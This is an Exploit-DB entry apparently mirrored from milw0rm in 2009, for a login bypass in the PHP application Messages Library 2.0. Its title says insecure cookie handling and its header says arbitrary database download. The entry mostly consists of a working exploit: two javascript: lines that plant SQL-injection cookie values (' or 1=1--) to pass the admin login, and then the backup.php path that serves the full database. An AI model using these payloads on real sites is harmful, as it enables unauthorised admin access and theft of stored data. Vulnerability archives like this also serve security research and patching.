Messages Library 2.0 Insecure Cookie Handling Vulnerability

2009-07-01T00:00:00
ID EDB-ID:9063
Type exploitdb
Reporter Stack
Modified 2009-07-01T00:00:00

Description

Messages Library 2.0 Insecure Cookie Handling Vulnerability. Webapps exploit for php platform

                                        
                                            # Messages Library 2.0 <=  Arbitrary Database Download Vulnerability
########################################
#[*] Founded &  Exploited by : Stack
########################################
 
Bypass with
 
javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/";
javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/";
 
After Exec
 
http://localhost/sms/admin/backup.php
 
and you got the database download

# milw0rm.com [2009-07-01]